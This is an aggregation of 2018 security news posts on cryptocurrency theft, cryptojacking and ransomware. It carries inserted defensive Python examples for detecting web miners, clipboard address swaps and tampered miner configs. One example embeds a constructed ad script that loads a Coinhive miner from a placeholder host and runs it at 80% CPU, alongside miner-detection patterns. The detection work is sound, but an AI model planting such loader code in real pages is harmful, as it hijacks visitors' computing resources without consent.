The number of cyber attacks against cryptocurrencies has increased due to the rapid rise in the value of currencies such as Bitcoin and Ethereum.

Hackers target almost every actor involved in the cryptocurrency business: individual users, miners and, of course, exchanges.

Security firms have detected several malware applications specifically designed to steal cryptocurrencies, and many websites have been compromised to install scripts that mine virtual coins by abusing the computational resources of unaware visitors.

Researchers at Trend Micro uncovered a spike in the number of Coinhive miners over the past few days, apparently linked to Google’s DoubleClick ads displayed on YouTube and other sites.

“On January 24, 2018, we observed that the number of Coinhive web miner detections tripled due to a malvertising campaign. We discovered that advertisements found on high-traffic sites not only used Coinhive (detected by Trend Micro as JS_COINHIVE.GN), but also a separate web miner that connects to a private pool,” states the analysis published by Trend Micro.

“We detected an almost 285% increase in the number of Coinhive miners on January 24. We started seeing an increase in traffic to five malicious domains on January 18. After closely examining the network traffic, we discovered that the traffic came from DoubleClick advertisements.”


The researchers observed two separate web cryptocurrency miner scripts, both hosted on AWS, that were called from a web page that presents the DoubleClick ad.

The advertisement includes JavaScript code that generates a random number between 1 and 101. If the number is greater than 10, the advertisement calls the coinhive.min.js script, which mines using 80% of the CPU’s power; in the remaining 10% of cases, the advertisement launches a private web miner, the mqoj_1.js script.

“The two web miners were configured with throttle 0.2, which means the miners will use 80% of the CPU’s resources for mining.” continues the analysis.
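As an added example (not Trend Micro’s code nor the article’s), here is a Python scanner a defender could run over ad markup: it flags loads of the two miner scripts named in the analysis and reads the throttle passed to Coinhive’s `new CoinHive.Anonymous(siteKey, {throttle: x})` call, reporting the CPU share the miner takes; the markup, host name and site key below are constructed for the example.

```python
"""Flag Coinhive-style web miners in advertisement or page markup."""
import re
from typing import Dict, List

# Script file names the Trend Micro analysis ties to the campaign.
KNOWN_MINER_SCRIPTS = ("coinhive.min.js", "mqoj_1.js")

# Any quoted string (a <script src> attribute or a JS string assigned to .src)
# whose path ends with one of the known miner file names.
MINER_URL_RE = re.compile(
    r'["\']([^"\']*(?:'
    + "|".join(re.escape(name) for name in KNOWN_MINER_SCRIPTS)
    + r'))["\']',
    re.IGNORECASE,
)

# Coinhive's public API: new CoinHive.Anonymous('<site key>', {throttle: 0.2})
# or new CoinHive.User('<site key>', '<user name>', {throttle: 0.2}).
MINER_CTOR_RE = re.compile(
    r"new\s+CoinHive\.(Anonymous|User)\s*\(\s*['\"]([^'\"]+)['\"]"  # kind, site key
    r"(?:\s*,\s*['\"][^'\"]*['\"])?"                               # optional user name
    r"\s*(?:,\s*\{([^}]*)\})?",                                    # optional options
    re.IGNORECASE,
)
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")


def scan_for_web_miners(markup: str) -> Dict[str, List]:
    """Return the miner script URLs and miner instantiations found in markup."""
    findings: Dict[str, List] = {"script_urls": [], "miners": []}
    for url in MINER_URL_RE.findall(markup):
        if url not in findings["script_urls"]:  # de-duplicate, keep order
            findings["script_urls"].append(url)
    for match in MINER_CTOR_RE.finditer(markup):
        kind, site_key, options = match.group(1), match.group(2), match.group(3) or ""
        throttle_match = THROTTLE_RE.search(options)
        # Coinhive's throttle is the fraction of time the miner idles; with no
        # throttle option the miner runs flat out.
        throttle = float(throttle_match.group(1)) if throttle_match else 0.0
        findings["miners"].append({
            "type": kind,
            "site_key": site_key,
            "throttle": throttle,
            "cpu_share_percent": round((1.0 - throttle) * 100),
        })
    return findings


def is_abusive(findings: Dict[str, List], max_cpu_share: int = 50) -> bool:
    """Policy check: any known miner script load, or a miner over the CPU budget."""
    if findings["script_urls"]:
        return True
    return any(m["cpu_share_percent"] > max_cpu_share for m in findings["miners"])


# Constructed ad markup mirroring the loader behaviour the article describes:
# draw a number in 1..101 and load one of the two miners depending on it.
# Host name and site key are placeholders, not values from the campaign.
SAMPLE_AD_MARKUP = """
<div class="ad-slot">
<script>
  var n = Math.floor(Math.random() * 101) + 1;
  var s = document.createElement('script');
  s.src = (n > 10) ? 'https://EXAMPLE-BUCKET.s3.amazonaws.com/coinhive.min.js'
                   : 'https://EXAMPLE-BUCKET.s3.amazonaws.com/mqoj_1.js';
  s.onload = function () {
    var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER', {throttle: 0.2});
    miner.start();
  };
  document.head.appendChild(s);
</script>
</div>
"""

if __name__ == "__main__":
    result = scan_for_web_miners(SAMPLE_AD_MARKUP)
    for url in result["script_urls"]:
        print("miner script load:", url)
    for miner in result["miners"]:
        print("miner instance:", miner)
    print("abusive:", is_abusive(result))
```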


Google promptly took action against the ads, which abused users’ resources in violation of its policies.

Blocking JavaScript from running in the browser can prevent the execution of Coinhive miners; the experts also suggest regularly patching and updating web browsers to reduce the risk.

Pierluigi Paganini

(Security Affairs – cryptocurrency, Coinhive)

The post Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner appeared first on Security Affairs.


Security Affairs: Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked

It is a black Friday for cryptocurrencies: after the news of the hack of the Japan-based digital exchange Coincheck, the value of the major cryptocurrencies dropped.

It is a black Friday for cryptocurrencies; the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012 and is one of the most important cryptocurrency exchanges in Asia.

Coincheck suspended deposits and withdrawals for all virtual currencies except bitcoin; the exchange announced it was investigating an “unauthorised access” to the exchange.

According to the company, the hackers stole NEM worth half a billion US dollars; NEM is the 10th biggest cryptocurrency by market capitalization.

The news of the incident had a significant impact on the NEM value, which dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected,”

NEM price chart after the Coincheck hack (source: CoinMarketCap.com)

The experts at the exchange are investigating the security breach to find out whether it originated in Japan or in another country.

Coincheck discovered the incident at 11.25 am and announced via Twitter the suspension of trading for all cryptocurrencies apart from bitcoin.

In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide; it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company had been stolen.

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked appeared first on Security Affairs.

Someone Stole Almost Half a BILLION Dollars from Japanese Cryptocurrency Exchange

Coincheck, a Tokyo-based cryptocurrency exchange, has suffered what appears to be the biggest hack in the history of cryptocurrencies, losing $532 million in digital assets (nearly $420 million in NEM tokens and $112 in Ripples). In 2014, Mt Gox, one of the largest bitcoin exchanges at that time, filed for bankruptcy after admitting it had lost $450 million worth of Bitcoins. Apparently, the

HOTforSecurity: Keylogger found on thousands of WordPress-based sites, stealing every keypress as you type

A new report from researchers at Sucuri reveals that websites are once again being found infected by cryptomining code – stealing the resources of visiting computers to mine for the Monero cryptocurrency.

Many web surfers almost certainly don’t realise that the reason that their laptop’s fan is running at full blast is because the website they are viewing is tied up with the complex number-crunching necessary to earn the digital currency.

But, in a twist, this particular attack isn’t just interested in mining Monero. While the website’s front-end is digging for cryptocurrencies, the back-end is secretly hosting a keylogger designed to steal unsuspecting users’ login credentials.

With the keylogger in place, any information entered on any of the affected websites’ web forms will be surreptitiously sent to the hackers.

And yes, that includes the site’s login form.

As if that wasn’t bad enough, what is typed in the forms is sent to the hackers even before the user has clicked on the “log in” button.

If a hacker manages to steal the credentials of the site’s administrator they won’t need to rely upon a vulnerability to break into the site in future, they can just login without a care in the world. (And yes, that’s another reason why WordPress accounts should be defended with two-factor authentication).

As Bleeping Computer reports, there are at least 2,000 WordPress sites infected with the keylogger. This is in addition to earlier related attacks which were affecting nearly 5,500 WordPress sites last month.

We’ve said it before, and we’ll no doubt say it again. And again.

If your website is powered by the self-hosted edition of WordPress, it’s essential that you keep both it, and any third-party plugins, updated.

Self-hosting your WordPress site is attractive in many ways, but you have to acknowledge that security is now your responsibility (or find yourself a managed WordPress host who is prepared to take it on for you). New vulnerabilities are found in the software and its many thousands of third-party plugins all the time.

In short, if you don’t know what you’re doing, there’s a chance that your WordPress-running website has security holes which a malicious hacker could exploit. Such security weaknesses could potentially damage your brand, scam your website visitors, and help online criminals to make their fortune.

Exploring the Correlation Between Bitcoin’s Boom and Evrial’s Capabilities

Many of the stealthiest cyberthreats out there spawn on underground forums, as malware authors leverage the space to sell unique variants to fellow criminals. And now there’s a new addition to the underground scene. Meet Evrial: a powerful, information-stealing Trojan which is currently for sale for 1,500 Rubles or $27 USD. Its author previously created another variant named CryptoShuffler, which allows cybercriminals to replace the Windows clipboard and steal files from cold cryptocurrency wallets, as well as passwords from programs/browsers. Its successor, Evrial, can steal browser cookies, swoop stored credentials, and monitor the Windows clipboard too — only now it can potentially hijack active cryptocurrency payments and send stolen money directly to a cybercriminal’s address.

Specifically, the Trojan is capable of monitoring the Windows clipboard for certain types of text, and if it detects specific strings, it can modify or even replace them with ones sent by the attacker. This could mean replacing legitimate addresses and URLs with ones under the attacker’s control; a regular Bitcoin address could suddenly become one belonging to a cybercriminal. If the target pastes that address into their app, thinking it’s the legitimate one, and sends Bitcoin, the cryptocurrency will soon be in the hands of the cybercriminal. Mind you, Evrial goes beyond Bitcoin, as it is also configured to detect strings that correspond to Litecoin, Monero, WebMoney and Qiwi addresses and Steam item trade URLs.
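As an added example (not McAfee’s code), a paste-time guard in Python for the substitution described above: it compares the address the user intended to send to with what actually came out of the clipboard, recognises Bitcoin, Litecoin and Monero address shapes with simplified regexes (an assumption of this example), and validates Bitcoin addresses with Base58Check so a corrupted paste is told apart from a swapped but well-formed one; the attacker address is constructed from a made-up hash.

```python
"""Paste-time guard against clipboard address swapping."""
import hashlib
import re
from typing import Optional

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# First-pass shape filters for the address types the article names as Evrial
# targets. Simplified for the example: legacy Bitcoin (1.../3...), legacy
# Litecoin (L.../M...) and 95-character Monero standard addresses.
ADDRESS_SHAPES = {
    "bitcoin": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "litecoin": re.compile(r"^[LM][1-9A-HJ-NP-Za-km-z]{26,33}$"),
    "monero": re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$"),
}


def base58_encode(raw: bytes) -> str:
    n = int.from_bytes(raw, "big")
    digits = ""
    while n:
        n, r = divmod(n, 58)
        digits = B58_ALPHABET[r] + digits
    pad = len(raw) - len(raw.lstrip(b"\x00"))  # each leading zero byte is a '1'
    return "1" * pad + digits


def base58_decode(text: str) -> bytes:
    n = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid base58 character {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def base58check_encode(version: int, payload: bytes) -> str:
    data = bytes([version]) + payload
    checksum = hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    return base58_encode(data + checksum)


def is_valid_base58check(address: str) -> bool:
    """True if the address decodes to 25 bytes whose last 4 bytes equal the
    first 4 bytes of double-SHA256 over the rest (P2PKH/P2SH format)."""
    try:
        raw = base58_decode(address)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def looks_like_address(text: str) -> Optional[str]:
    for coin, pattern in ADDRESS_SHAPES.items():
        if pattern.match(text):
            return coin
    return None


def check_paste(intended: str, pasted: str) -> str:
    """Classify the pasted text against the address the user meant to use."""
    if pasted == intended:
        return "ok"
    coin = looks_like_address(pasted)
    if coin is None:
        return "not-an-address"
    if coin == "bitcoin" and not is_valid_base58check(pasted):
        return "malformed-address"  # corrupted, not a usable payment target
    return f"swapped-{coin}"  # a different, well-formed address: the Evrial case


# Well-known public Bitcoin address (the genesis block coinbase address).
INTENDED_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
# Constructed "attacker" address: valid Base58Check over a made-up hash.
ATTACKER_ADDRESS = base58check_encode(0x00, b"\x11" * 20)

if __name__ == "__main__":
    for pasted in (INTENDED_ADDRESS, ATTACKER_ADDRESS, INTENDED_ADDRESS[:-1] + "b"):
        print(pasted, "->", check_paste(INTENDED_ADDRESS, pasted))
```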

Evrial is just one of many Bitcoin-centric news stories lately, as cryptocurrency in general has been on practically everyone’s minds – which begs the question, is there a connection? Is the increased focus on digital currency inciting the creation of malware variants designed specifically to capitalize on Bitcoin’s boom?

In short – yes and no. Historically, cryptocurrencies have been a popular mechanism on underground markets for several years. Other digital currencies were used in the past but presented problems for bad actors due to their centralized nature. However, Blockchain technology, which powers cryptocurrencies like Bitcoin and is designed to be decentralized, allowed bad actors to protect their assets from law enforcement. Noticing this value, criminals on underground markets began to use this to their benefit well before the value of Bitcoin reached $1000+ a coin.

But soon enough Bitcoin’s value continued to grow and malware authors took notice, as they began to target Bitcoin wallets rather than simply trade in it. Ransomware exploded, holding victims’ files and machines hostage for payment almost exclusively in Bitcoin. Malware that was traditionally sold as a scraper (to steal credit card information and passwords) was upgraded to include a cryptocurrency mining feature and was sold at a premium price.

Bad actor adoption of cryptocurrency has been both significant and quick, and notably much faster than the general population. Malware that uses, steals, and is sold with cryptocurrency is now the norm. And now as the general population’s interest in cryptocurrency has exploded, we’ve seen an increase in interest from malware authors as well. This interest has led to new malware behavior, such as Evrial’s ability to scan clipboards for cryptocurrency addresses. It’s had a major impact in how business is done in the underground.

However, it’s important to note that Bitcoin’s popularity presents its own problems. The volatile value has made the buying and selling of illicit goods problematic. Additionally, the pricing of a ransom is now askew. This has forced some markets to move to multi-coin platforms (namely incorporating Monero) as an alternative and some malware families to turn to other alt-coins to mine or steal.

All in all, cryptocurrency is no different than other motivators before it – when cybercriminals find the right opportunity to enhance their profitability, they capitalize on it. And when road blocks emerge, they find ways to maneuver around them. Now, the next step for cyber defenders is to keep their eyes peeled for what’s next, and eventually — outpace cybercriminals entirely.

To learn more about the fight against Evrial and other Trojans like it, be sure to follow us at @McAfee and @McAfee_Labs.

The post Exploring the Correlation Between Bitcoin’s Boom and Evrial’s Capabilities appeared first on McAfee Blogs.


New ransomware dubbed MoneroPay targets crypto-fans, impersonates wallet

Crypto-fans are now being targeted by MoneroPay, a new ransomware released on Jan. 6 in a thread discussing altcoins on the popular crypto forum BitcoinTalk. It posed as a wallet for the SpriteCoin cryptocurrency, and enthusiasts rushed to download it in the hope of making a lot of money fast.

The authors of the ransomware took advantage of the surge in interest in cryptocurrency to target some tech-savvy users. Such wallets are often flagged by security solutions, so many users have made a habit of disabling their security software to avoid false positives.

The hackers behind MoneroPay exploited this practice and created the malware to perfectly impersonate a regular installation. Once MoneroPay was installed on their devices, it started collecting user data and passwords saved in Firefox and Chrome. The data is sent to a C2 server.

The victims figured out they were dealing with ransomware only after the supposed full sync with the blockchain completed and a notice appeared stating that their data had been encrypted.

According to BleepingComputer, the ransomware encrypts files with extensions including those associated with programming languages, such as txt, doc, rtf, cpp, tcl, html, ppt, docx, xls, xlsx, pptx, key, pem, psd, mkv, mp4, ogv, zip, jpg, jpeg, work, pyw, hpp, cgi, rar, lua, img, iso, webm, jar, java, class, one, htm, css, vbs, eps, psf, png, apk, ps1 and wallet.dat. MoneroPay appends the .encrypted extension to the encrypted files.

Even though crypto-fans are usually tech savvy, malware developers collect insights from multiple threads on the forum, and elsewhere, to take advantage of their weaknesses. This is precisely why they need to take extra security measures such as keeping regular backups of their data so it can be restored if encrypted or lost, and using a virtual machine to scan files before download to ensure they’re not malware.


Security Affairs: Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

Researchers from Fortinet FortiGuard Labs have discovered a strain of ransomware that only accepts Monero payments from victims and pretends to be a cryptocurrency-related password store.

The ransomware poses as a “spritecoin” wallet: it asks users to create a password of their choice, but instead of downloading the blockchain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops on the target system a ransom note of “Your files are encrypted.”


The malware includes an embedded SQLite engine, which leads experts to believe it also harvests credentials from the Chrome and Firefox credential stores. The malicious code appends the .encrypted extension to encrypted files (e.g. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While we have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

“In this case, the threat arrives as a ‘SpriteCoin’ package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”


Once the victim provides a password, the Spritecoin ransomware tells the user it is downloading the blockchain, while it is actually encrypting the files.

The ransomware connects to a Tor site via an onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a Tor connection.

Further details, including IoCs are included in the report.

Pierluigi Paganini

(Security Affairs – Spritecoin ransomware, Monero)


The post Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data appeared first on Security Affairs.

New Malware Hijacks Cryptocurrency Mining

This is a clever attack.

After gaining control of the coin-mining software, the malware replaces the wallet address the computer owner uses to collect newly minted currency with an address controlled by the attacker. From then on, the attacker receives all coins generated, and owners are none the wiser unless they take time to manually inspect their software configuration.

So far it hasn't been very profitable, but it -- or some later version -- eventually will be.
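The article's point is that the owner only notices the substitution by inspecting the miner's configuration by hand. The check below automates that inspection. It is an added example, not code from the post or from the article it quotes: the JSON layout (a "pools" list with "url", "user" and "pass" keys, as several open-source CPU miners use) is an assumption, and the wallet, pool and worker names are constructed.

```python
"""Check a coin miner's configuration for a swapped payout address.

Added example, not code from the post or the article it quotes. The JSON
layout (a "pools" list with "url"/"user"/"pass" keys) mirrors what several
open-source CPU miners use but is an assumption here, as are all sample values.
"""
import json

# Constructed values: the wallet and pool the machine's owner actually set up.
EXPECTED_WALLET = "4OWNERWALLETxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
ALLOWED_POOLS = {"pool.example.invalid"}

# Constructed config as the owner wrote it (a worker suffix on the wallet is normal).
GOOD_CONFIG = json.dumps({
    "pools": [{"url": "stratum+tcp://pool.example.invalid:3333",
               "user": EXPECTED_WALLET + ".rig01", "pass": "x"}]
})

# Constructed config after the substitution described above: same pool, but
# the "user" field (the payout address) now belongs to someone else.
TAMPERED_CONFIG = json.dumps({
    "pools": [{"url": "stratum+tcp://pool.example.invalid:3333",
               "user": "4ATTACKERWALLETyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy",
               "pass": "x"}]
})


def base_address(user_field: str) -> str:
    """Strip the worker-name ("wallet.rig01") or difficulty ("wallet+5000")
    suffix some miners append, leaving only the payout address."""
    for sep in (".", "+"):
        user_field = user_field.split(sep, 1)[0]
    return user_field


def pool_host(url: str) -> str:
    """Reduce 'stratum+tcp://host:port' or 'host:port' to just the host."""
    return url.split("://")[-1].rsplit(":", 1)[0]


def audit_miner_config(config_text: str, expected_wallet: str, allowed_pools: set) -> list:
    """Return human-readable findings; an empty list means the config still
    pays the owner's wallet at an approved pool."""
    cfg = json.loads(config_text)
    findings = []
    pools = cfg.get("pools") or []
    if not pools:
        findings.append("no pools configured")
    for i, pool in enumerate(pools):
        url = str(pool.get("url", ""))
        if pool_host(url) not in allowed_pools:
            findings.append(f"pool[{i}] url {url!r} is not an approved pool")
        user = str(pool.get("user", ""))
        if base_address(user) != expected_wallet:
            findings.append(f"pool[{i}] pays {user!r} instead of the owner's wallet")
    return findings


if __name__ == "__main__":
    for name, text in (("good", GOOD_CONFIG), ("tampered", TAMPERED_CONFIG)):
        problems = audit_miner_config(text, EXPECTED_WALLET, ALLOWED_POOLS)
        print(name, "->", problems or "OK")
```

Run on a schedule against the live config file (and compare against the copy the owner keeps elsewhere), the check turns the "manual inspection" the article mentions into an alert; comparing the pool host as well as the wallet catches the variant where the attacker points the miner at a pool of their own.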

The State of Security: Cryptocurrency Hacks and Heists in 2017

The cryptocurrency rush took the world by storm last year. This dynamic environment lured new players, including hungry investors, miners, and enthusiasts looking to try their hand at innovative startups, not to mention threat actors. We witnessed blockchain splits, a boom of Initial Coin Offerings (ICOs), regulatory attempts by governments, the granting of official status to Bitcoin […]

The post Cryptocurrency Hacks and Heists in 2017 appeared first on The State of Security.

Cybersecurity week Round-Up (2018, Week 3)

Cybersecurity week Round-Up (2018, Week 3): let’s try to summarize the most important events that occurred last week in 3 minutes.

The week started with the discovery of a new variant of the dreaded Mirai botnet, dubbed Okiru. For the first time, a malware strain targets ARC-based IoT devices, and billions of IoT devices are potentially at risk.

Kaspersky published a report on a powerful Android malware, dubbed SkyGoFree, developed for surveillance purposes by an Italian firm. The same malware was analyzed months before by researchers at CSE Cybsec in November 2017.

Also interesting is the discovery of a new variant of the KillDisk wiper that targeted Windows machines in financial institutions in Latin America.

Spectre and Meltdown continue to make the headlines, and many users report problems with the installed security patches, while Oracle announced patches for the vulnerabilities affecting Intel CPUs.

Crooks continue to focus their interest on cryptocurrencies. The BlackWallet.co web-based wallet application for the Stellar Lumen cryptocurrency suffered a DNS hijacking attack that resulted in the theft of $400,000.

Security researchers at Check Point have spotted a malware family dubbed RubyMiner that is targeting web servers worldwide in an attempt to exploit their resources to mine Monero cryptocurrency.

This week also saw the emergence of a Lebanese APT, dubbed Dark Caracal, that has been operating since at least 2012 using a powerful Android spyware. Its arsenal also includes Windows malware and the surveillance software FinFisher.

Experts from the Talos group published an interesting article on the North Korean Group 123, involved in at least 6 different hacking campaigns in 2017.

Pierluigi Paganini

(Security Affairs – cybersecurity)

The post Cybersecurity week Round-Up (2018, Week 3) appeared first on Security Affairs.

Why David Stockman Thinks Cryptocurrency Investors Are “Stupid Speculators”

In a statement made earlier this month, former Director of the Office of Management David Stockman stated his distrust for investors of the cryptocurrency market. In his view, the cryptocurrency market is filled with “stupid speculators” and that a “spectacular crash” is imminent. Let’s take a look at the whole statement from Mr. David Stockman […]

The post Why David Stockman Thinks Cryptocurrency Investors Are “Stupid Speculators” appeared first on Hacked: Hacking Finance.

Lasers Eyed as Way Forward for Quantum Encryption of Data, Cryptocurrencies

Researchers at the University of Southern California have developed a technology called a frequency comb that could pave the way for quantum-encryption technologies to be used to protect mobile data and digital currencies. Given yesterday’s news that cryptocurrencies remain in the crosshairs of hackers, people would surely welcome new methods to...


Webroot Threat Blog: Cyber News Rundown: Healthcare Ransomware

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst, and a guy with a passion for all things security. Any questions? Just ask.

Hospital Pays Ransom to Restore Systems, Despite Having Backups

In the first cyberattack of 2018 to hit a healthcare organization, an Indiana hospital’s entire network was taken offline. Despite having full backups on-hand, the hospital paid the $55,000 Bitcoin ransom right away. Officials stated they paid the ransom to get the systems back to normal as quickly as possible, since restoring everything from their backups could have taken weeks. Fortunately for patients, no data was stolen, and the staff could continue assisting new arrivals the old-fashioned way (that’s right: pen and paper) until system functionality was restored.

Audio Attacks Used for Damaging Hard Drives

A recent collaborative study performed by two universities proved that, within a reasonable proximity, an attacker could use acoustic signals to target a hard disk drive, leading to data corruption on the device. While many people could explain why this type of attack is possible, the study determined that the attacks required not only a specific frequency based on the hard drive in question, but also a precise distance from the drive and angle of sound projection to execute a successful attack.

New Android Platform Takes Spying to New Heights

A new Android spying platform has been discovered that puts all its predecessors to shame. By implementing several new features, such as location-based audio recording, compromising WhatsApp messages, and even allowing attackers to connect the device to malicious WiFi networks, this software platform gives attackers an all-new range of methods to target victims. The platform is based around five known exploits in the Android OS, and it uses them to gain administrative access to the device.

Latest Netflix Phish Asks for User Selfie

Within the last week, a new email phishing campaign has been spotted targeting Netflix users. The email informs users that a “hold” has been placed on their account pending further information. It requests users upload a photo of themselves with an ID card and prompts them to update their billing information, before redirecting them to the real Netflix login page.

RubyMiner Found on Older Linux and Windows Servers

A new cryptocurrency miner variant has been targeting outdated system servers that run both Linux and Windows. The variant, known as RubyMiner, identifies the unsecured servers using a web server tool, then gains access via a variety of exploits to install a modified Monero miner. RubyMiner deviates from similar miners in that it focuses on machines that have likely been forgotten about, and so remain on without being regularly patched.

The post Cyber News Rundown: Healthcare Ransomware appeared first on Webroot Threat Blog.

Cryptocurrency Mining Malware Infects More Than Half of Organizations Globally

More than half of organizations around the world were struck by threat actors using cryptocurrency mining tools to steal corporate computing resources last month, a trend that will likely continue in 2018, according to recent research.

The Golden Age of Cryptocurrency Crime

The popularity of bitcoin, Ethereum and other cryptocurrencies is likely fueling interest among rogue actors to prey upon the CPU power behind major websites and streaming services. According to Check Point’s most recent “Global Threat Index,” the top 100 malware included 10 different kinds of cryptocurrency mining tools. In some cases, 65 percent of a system’s resources are being drained for mining, going far beyond legitimate or legal uses of the software.

Although the cybercriminals behind such attacks aren’t necessarily going after victims’ personal data or money, the tactics are somewhat similar. Infosecurity Magazine reported that some attackers inject malicious code into ads, otherwise known as malvertising, to install cryptocurrency mining tools designed to harvest Monero. All someone would have to do is click on a pop-up ad and the process would begin without their knowledge.

Digging Into Cryptocurrency Mining Tools

Many of the cryptocurrency mining applications in question were never intended to be misused like this. As WCCF Tech pointed out, Cryptoloot and Coinhive were initially seen as ways for certain online properties to generate additional revenue, but bad actors are capitalizing on their capabilities. In other cases, sites such as Pirate Bay have taken advantage of their visitors by running these tools quietly in the background.

Check Point research also revealed that there are some downright malicious cryptocurrency mining tools on the market, such as the RIG exploit kit. SecurityBrief suggested that, for some threat actors, harvesting bitcoin might be easier and more lucrative than using ransomware to take over an individual system or device.

As the cryptocurrency gold rush gains steam, there’s no telling how many more cybercriminals are going to get in on the act.

The post Cryptocurrency Mining Malware Infects More Than Half of Organizations Globally appeared first on Security Intelligence.

Infosecurity.US: Negative Factorization of Cryptocurrency

Well-crafted reportage/speculative piece on the negatives of cryptocurrency via Matthew Leising and Rob Urban, writing at Bloomberg, in which the details of human psychology (as that psychology relates to both markets and cryptocurrency) are laid bare. Today's MustRead.


Cryptocurrency Exchanges, Students Targets of North Korea Hackers

Late-2017 state-sponsored cyber attacks by North Korea against South Korea not only targeted cryptocurrency users and exchanges, but also college students interested in foreign affairs, new research from Recorded Future has found. North Korea shows no signs of letting up on its cyber war against South Korea with state-sponsored attacks against...


Over $400,000 worth of Stellar Lumen Cryptocurrency Stolen in BlackWallet DNS Hijack

Following a recent hijack of BlackWallet’s DNS server, hackers have allegedly stolen almost 670,000 Lumens from users’ wallets, estimated to be worth around $400,000.

BlackWallet.co is a web-based wallet application that lets users manage their Stellar Lumen Cryptocurrency (XLM). The DNS hijack allowed cybercriminals to redirect victims to an attacker-controlled server, from which they could manipulate transactions. If users had more than 20 Lumens in their wallet, the funds would automatically be transferred to the attacker’s wallet.

“If you used BlackWallet in the past then use your Secret Key and login to Stellar Account Viewer to use them. If you don’t login in the BlackWallet website your XLM is safe,” reads a warning. “Lumens are not stored in the wallets, Lumens are ALWAYS stored in the network, you just use wallets to have access to the network. If you use BlackWallet with your Secret Key then the script will steal your Secret Key and then your Lumens.”

Although the warning was posted on social media and microblogging platforms, it does seem that around $400,000 worth of cryptocurrency was stolen. In the following hours, attackers started making transactions using the stolen XLMs, effectively laundering the stolen funds and hiding their tracks.

“I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account,” wrote the creator of BlackWallet. “I am sincerely sorry about this and hope that we will get the funds back. I am in talks with my hosting provider to get as much information about the hacker and will see what can be done with it.”

This is not the first time hackers have made off with cryptocurrencies, and it definitely won’t be the last. Everyone who recently visited BlackWallet is strongly encouraged to move their funds to a new wallet – if any still remain.

Crypto-Miner Named the “Most Wanted” Malware for December 2017

A JavaScript-based cryptocurrency miner earned the top spot in a list of the “most wanted” malware for December 2017. For its final Global Threat Index of 2017, Check Point observed Coinhive supplant Roughted, a large-scale malvertising campaign, as the most prevalent form of malware. This Monero-miner made waves back in October 2017 when it registered […]

The post Crypto-Miner Named the “Most Wanted” Malware for December 2017 appeared first on The State of Security.

Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday.

From: Florine Fray [Fray.419@redacted.tld]
Date: 15 January 2018 at 10:51
Subject: Could this digital currency actually make you a millionaire?

Every once in a while, an opportunity comes

Kodak Launches Own Cryptocurrency KODAKCoin — Stocks Surge

In a tie-up with WENN Digital, a blockchain development firm, Kodak announced a photo-centric cryptocurrency, KODAKCoin, causing a 60 percent stock rise after the surprise announcement.

